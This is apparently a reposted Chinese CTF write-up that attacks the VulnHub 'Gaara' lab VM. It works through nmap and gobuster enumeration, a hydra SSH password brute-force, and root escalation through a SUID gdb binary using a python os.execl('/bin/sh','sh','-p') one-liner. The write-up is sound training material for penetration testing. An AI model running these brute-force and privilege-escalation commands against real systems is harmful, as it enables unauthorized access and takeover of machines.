实战打靶集锦-026-Gaara

文章目录

  • 1. 主机发现
  • 2. 端口扫描
  • 3. 服务枚举
  • 4. 服务探查
  • 5. 突破边界
  • 6. 提权
    • 6.1 枚举系统信息
    • 6.2 查看passwd文件
    • 6.3 查看定时任务
    • 6.4 查看可执行文件
    • 6.5 查看家目录
    • 6.6 Linpeas提权
  • 7. 获取flag
  • 写在最后


靶机地址:https://download.vulnhub.com/gaara/Gaara.ova

1. 主机发现

目前只知道目标靶机在192.168.232.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.232.0/24

在这里插入图片描述
锁定目标靶机IP为192.168.232.146。

2. 端口扫描

通过下面的命令对目标靶机进行端口扫描。

$ sudo nmap -p 1-65535 192.168.232.146 

在这里插入图片描述
开放的端口不多,只有一个22端口和80端口,接下来枚举一下对应的服务。

3. 服务枚举

通过下面的命令枚举一下目标端口上的服务。

$ sudo nmap -p22,80 -A -sT -sV 192.168.232.146

在这里插入图片描述
信息不是太多,还是直接探查一下。

4. 服务探查

先用浏览器访问一下看看。
在这里插入图片描述
感觉是有个图片,不过显示不出来,还是枚举一下目录吧。

$ dirsearch -u http://192.168.232.146:80/ 

在这里插入图片描述
有些诧异,竟然没有一个是可以直接访问的内容。用dirb挂载big字典试试看。

$ dirb http://192.168.232.146 /usr/share/wordlists/dirb/big.txt

在这里插入图片描述
效果是一样的,感觉有些无从下手。猛然想起可能是我之前打靶时修改了/etc/hosts文件导致的,修改回来再试一下,结果还是同样的现象,有点难以置信啊,再试试gobuster。

$ gobuster dir -u http://192.168.232.146:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述
额,gobuster确实更胜一筹,扫描出了一个/Cryoserver的目录,并且还是200,手工进去看看。
在这里插入图片描述
打开也是空空如也,看看页面源代码。
在这里插入图片描述
跟上个靶机一样的尿性,最底下有三个目录,分别进去看看。
在这里插入图片描述
全都报404啊,去掉前面一层/Cryoserver目录试试看,结果全都是如下图所示的密密麻麻的文字。
在这里插入图片描述
大概看了一下,没有发现什么异常内容,不过感觉三个页面的内容都差不太多,先通过比对工具(这里直接用meld工具进行三路比对)看一下有什么区别。发现/Temari和/Kazekage的内容是一致的,不过跟/iamGaara的内容不一致,有一个类似于密码的一串内容,甚是可疑,如下图。
在这里插入图片描述
但是哪个用户的密码呢?文本中出现了好几个名字,直接用cewl针对/iamGaara页面生成一个用户名列表,并采用小写字母。

$ cewl --lowercase -m 3 -x 10 http://192.168.232.146/iamGaara > myUser.txt
$ hydra -L myUser.txt -p f1MgN9mTf9SNbzRygcU 192.168.232.146 ssh

在这里插入图片描述
爆破失败,先手工试试gaara是不是我们需要的账号吧。
在这里插入图片描述
也看不出来,直接用gaara用户挂上rockyou爆破一下看看。

$ hydra -l gaara -P ../../rockyou.txt 192.168.232.146 ssh

分分钟爆破成功,gaara用户的密码是iloveyou2,手工登录进去看看。

5. 突破边界

通过下面的命令登录一下gaara用户。

$ ssh gaara@192.168.232.146 -t "bash --noprofile"

在这里插入图片描述

6. 提权

先优化一下shell。

gaara@Gaara:~$ whereis python
gaara@Gaara:~$ /usr/bin/python3.7 -c "import pty;pty.spawn('/bin/bash')"

6.1 枚举系统信息

通过下面的命令枚举一下。

gaara@Gaara:~$ uname -a
gaara@Gaara:~$ cat /etc/*-release

在这里插入图片描述
是64位的debian10。

6.2 查看passwd文件

先看看passwd中有哪些用户。

gaara@Gaara:~$ cat /etc/passwd | grep -v "nologin" 

在这里插入图片描述
除了gaara和root也没有其它的用户,看看是否有写入权限。
在这里插入图片描述
没有权限。

6.3 查看定时任务

先看看是否有定时任务。

gaara@Gaara:~$ cat /etc/crontab

在这里插入图片描述
没有可疑任务发现。

6.4 查看可执行文件

先看看是否有可执行文件。

gaara@Gaara:~$ sudo -l

在这里插入图片描述

gaara@Gaara:~$ find / -user root -perm -4000 2>/dev/null

在这里插入图片描述
暂时看不出异样,等会儿用linpeas看一下。

6.5 查看家目录

看看家目录下都有些啥。

gaara@Gaara:~$ ls -lah ~/

在这里插入图片描述
这里面有个Kazekage.txt的文件比较可疑,里面的内容很像是一个密码,或者编码后的内容。
在这里插入图片描述
其它没有太特殊的内容,先把这一串内容看看是否可以base64之类的解码一下。

gaara@Gaara:~$ echo "L3Vzci9sb2NhbC9nYW1lcw==" | base64 -d

在这里插入图片描述
额,莫非解码的内容就是“/usr/local/games”?把这个再base64编码一下看看吧。
在这里插入图片描述
还真是,既然这样,就到这个目录下去看看吧。
在这里插入图片描述
额,又是一个比较可疑的文件,看看里面都是啥。
在这里插入图片描述
完全看不懂,这条线估计要断了。

6.6 Linpeas提权

直接用linpeas看看吧。

gaara@Gaara:~$ chmod u+x linpeas.sh
gaara@Gaara:~$ sh linpeas.sh

看到/usr/bin/gdb具有SUID权限。
在这里插入图片描述
直接用gdb尝试一下提权。

gaara@Gaara:/tmp$ /usr/bin/gdb -nx -exec '!bash'

在这里插入图片描述
感觉貌似提权成功了,验证一下看看。
在这里插入图片描述
看来我高兴的太早了,并没有提权成功,添加一下sudo试试。

gaara@Gaara:/tmp$ sudo /usr/bin/gdb -nx -exec '!bash'

在这里插入图片描述
直接没有权限。不过从网上找到用gdb执行python指令是可以提权的,试一下。

gaara@Gaara:/tmp$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

在这里插入图片描述
这次出现了心心念念的#,应该是提权成功了,验证一下。
在这里插入图片描述
确实成功了。

7. 获取flag

获取一下flag。
在这里插入图片描述

写在最后

其实前面我们发现的一段乱七八糟的内容,后来查了一下,是有出处的,叫做brainfuck。Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。这就是一个语言,但它不像C++那么多元化,但难度也一定的增加,因为它只有8种关键字!它有很多种特性,这里就不一一说明了,我们直接把前面的那一坨东西解码看看是啥。
在这里插入图片描述
就是依据简单的调侃的文字,没有什么特别的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/421078.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

第六节:Vben Admin权限-后端控制方式

系列文章目录 第一节:Vben Admin介绍和初次运行 第二节:Vben Admin 登录逻辑梳理和对接后端准备 第三节:Vben Admin登录对接后端login接口 第四节:Vben Admin登录对接后端getUserInfo接口 第五节:Vben Admin权限-前端控制方式 文章目录 系列文章目录前言一、角色权限(后端…

7. 构建简单 IPv6 网络

7.1 实验介绍 7.1.1 关于本实验 IPv6(Internet Protocol Version 6)也被称为IPng(IP Next Generation)。它是Internet工程任务组IETF(Internet Engineering Task Force)设计的一套规范,是IPv4…

python水表识别图像识别深度学习 CNN

python水表识别,图像识别深度学习 CNN,Opencv,Keras 重点:项目和文档是本人近期原创所作!程序可以将水表图片里面的数据进行深度学习,提取相关信息训练,lw1.3万字重复15%,可以直接上交那种&…

神经网络之万能定理python-pytorch实现,可以拟合任意曲线

神经网络之万能定理python-pytorch实现,可以拟合任意曲线 博主,这几天一直在做这个曲线拟合的实验,讲道理,网上可能也有很多这方面的资料,但是博主其实试了很多,效果只能对一般的曲线还行,稍微…

Azure AD使用SAML登录OpenSearch

Azure AD的配置如下: 登录 Global Azure 控制台,选择并切换至 Azure Active Directory 服务,在左侧的侧边栏选择 Enterprise applications,All Applications 页面点击 New application. 选择 Create your own application&#x…

多行业万能预约门店小程序源码系统 支持多门店预约小程序 带完整的安装代码包以及搭建教程

随着消费者对于服务体验要求的不断提升,门店预约系统成为了许多行业提升服务质量、提高运营效率的重要工具。然而,市面上的预约系统往往功能单一,无法满足多行业、多场景的个性化需求。下面,小编集合了多年的行业经验和技术积累&a…

【数据结构与算法】动态规划法解题20240302

这里写目录标题 一、198. 打家劫舍1、动态规划五部曲 二、213. 打家劫舍 II 一、198. 打家劫舍 你是一个专业的小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,影响你偷窃的唯一制约因素就是相邻的房屋装有相互连通的防盗系统,如果两间…

深度学习 精选笔记(10)简单案例:房价预测

学习参考: 动手学深度学习2.0Deep-Learning-with-TensorFlow-bookpytorchlightning ①如有冒犯、请联系侵删。 ②已写完的笔记文章会不定时一直修订修改(删、改、增),以达到集多方教程的精华于一文的目的。 ③非常推荐上面(学习参考&#x…

hippy 调试demo运行联调-mac环境准备篇

适用对于终端编译环境不熟悉的人看,仅mac端 hippy 调试文档官网地址 前提:请使用node16 联调预览效果图: 编译iOS Demo环境准备 未跑通,待补充 编译Android Demo环境准备 1、正常安装Android Studio 2、下载Android NDK&a…

【Linux C | 网络编程】套接字选项、getsockopt、setsockopt详解及C语言例子

😁博客主页😁:🚀https://blog.csdn.net/wkd_007🚀 🤑博客内容🤑:🍭嵌入式开发、Linux、C语言、C、数据结构、音视频🍭 🤣本文内容🤣&a…

StarRocks实战——表设计规范与监控体系

目录 前言 一、StarRocks表设计 1.1 字段类型 1.2 分区分桶 1.2.1 分区规范 1.2.2 分桶规范 1.3 主键表 1.3.1 数据有冷热特征 1.3.2 大宽表 1.4 实际案例 1.4.1 案例一:主键表内存优化 1.4.2 案例一:Update内存超了,导致主键表导…

华为HCIP Datacom H12-821 卷3

1.单选题 四台路由器运行 IS-IS 且已经建立邻接关系,区域号和路由器的等级如图中标记,则 R4到达 10.0.2.2/32 的的 Cost 值为多少? A、40 B、10 C、20 D、30 正确答案: D 解析: 由于没有配置路由渗透,所以R4会选择…

02-prometheus监控-服务器节点监控node-exporter

一、概述 prometheus,本身是一个【数据收集】和【数据处理】的工具,如果效果要监控一台服务器物理机,有两种方式,一种是在物理机上部署“node-export”来收集数据上报给prometheus,另一种是“自定义监控”;…

【数据结构】顺序表和链表的对比,在各种情况下如何选择

顺序表详细内容: 【数据结构】线性表 顺序表(动态、静态分配,插入删除查找基本操作)解析完整代码 单链表详细内容: 【数据结构】单链表解析完整代码(插入、删除、尾插法、头插法、按值和按位查找、前插和后…

SpringMVC自定义视图解析器

/** * 使用View接口完成请求转发|重定向 * 解释: * SpringMVC的官方,提供了一个叫做View的接口,告诉开发人员 * DispatcherServlet底层会调用View接口的实例化对象中的逻辑方法 * 来完成对应的请求转发和重定向。 * 使用: * 1. 单元方法的返回值为View接…

git根据文件改动将文件自动添加到缓冲区

你需要修改以下脚本中的 use_cca: false 部分 #!/bin/bash# 获取所有已修改但未暂存的文件 files$(git diff --name-only)for file in $files; do# 检查文件中是否存在"use_cca: false"if grep -q "use_cca: false" "$file"; thenecho "Ad…

Android 跨进程通信aidl及binder机制详解(一)

前言 上文中描述了,什么是绑定服务、以及创建一个绑定服务都可以通过哪些方式,同时说了通过扩展Binder类来创建一个绑定服务,并使用一个例子来说明了客户端与服务端的绑定过程,最后又总结了绑定服务的生命周期与调用过程。由于上…

【Vue3】自定义 Vue3 插件(全局实现页面加载动画)

// main.ts import { createApp } from vue import App from ./App.vue import Loading from "./components/Loading/index.ts";const app createApp(App) type Lod {show: () > void,hide: () > void } //编写ts loading 声明文件放置报错 和 智能提示 decl…

虚拟机部署Sentry步骤,国内地址

Unity3D特效百例案例项目实战源码Android-Unity实战问题汇总游戏脚本-辅助自动化Android控件全解手册再战Android系列Scratch编程案例软考全系列Unity3D学习专栏蓝桥系列ChatGPT和AIGC 👉关于作者 专注于Android/Unity和各种游戏开发技巧,以及各种资源分…

Cesium插件系列——3dtiles压平

本系列为自己基于cesium写的一套插件具体实现。 这里是根据Cesium提供的CustomShader来实现的。 在CustomShader的vertexShaderText里,需要定义vertexMain函数,例如下: struct VertexInput {Attributes attributes;FeatureIds featureIds;…